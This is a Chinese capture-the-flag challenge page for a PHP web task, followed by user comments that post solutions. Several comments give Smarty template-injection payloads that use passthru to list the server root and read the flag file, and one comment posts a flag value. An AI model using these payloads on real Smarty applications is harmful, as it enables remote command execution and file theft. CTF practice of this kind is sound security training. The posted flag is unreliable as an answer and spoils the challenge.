聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 3176
提  示:
描  述:
聪明的php
评论
docker0w 3月前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 1

bx33661 4月前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 5月前

?key={{passthru('ls /')}}

回复 0

xinkuang 7月前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

YUMEKO 9月前

http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了

回复 0

Daniel2023 10月前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 11月前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

EtHat 1年前

index.php?a={passthru("tac /_4060")}

回复 0
FUCK123 7月前

fnmdp

回复 0

18904484271 1年前

好垃圾的靶场,明明flag出来了,但是提交显示不正确

回复 1

haker111 1年前

看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}

回复 1

WriteUp

image
midi

3 金币

评分(11)

解题动态

feifeifei1212 攻破了该题 12小时前
13184971752 攻破了该题 1天前
YameMres 攻破了该题 1天前
lwh20060523 攻破了该题 2天前
besty2k 攻破了该题 3天前
zttyzz 攻破了该题 3天前
oohyodec 攻破了该题 4天前
zwhnsh 攻破了该题 4天前
15195388189 攻破了该题 6天前
平凡的人 攻破了该题 10天前
xiaoli98 攻破了该题 10天前
unilot 攻破了该题 13天前
5013230204 攻破了该题 13天前
creeee4esp 攻破了该题 13天前
montarius 攻破了该题 14天前
test002 攻破了该题 15天前
陈尘 攻破了该题 15天前
hikarical 攻破了该题 16天前
她说我们只是朋友 攻破了该题 17天前
lizhongtian 攻破了该题 17天前
问题反馈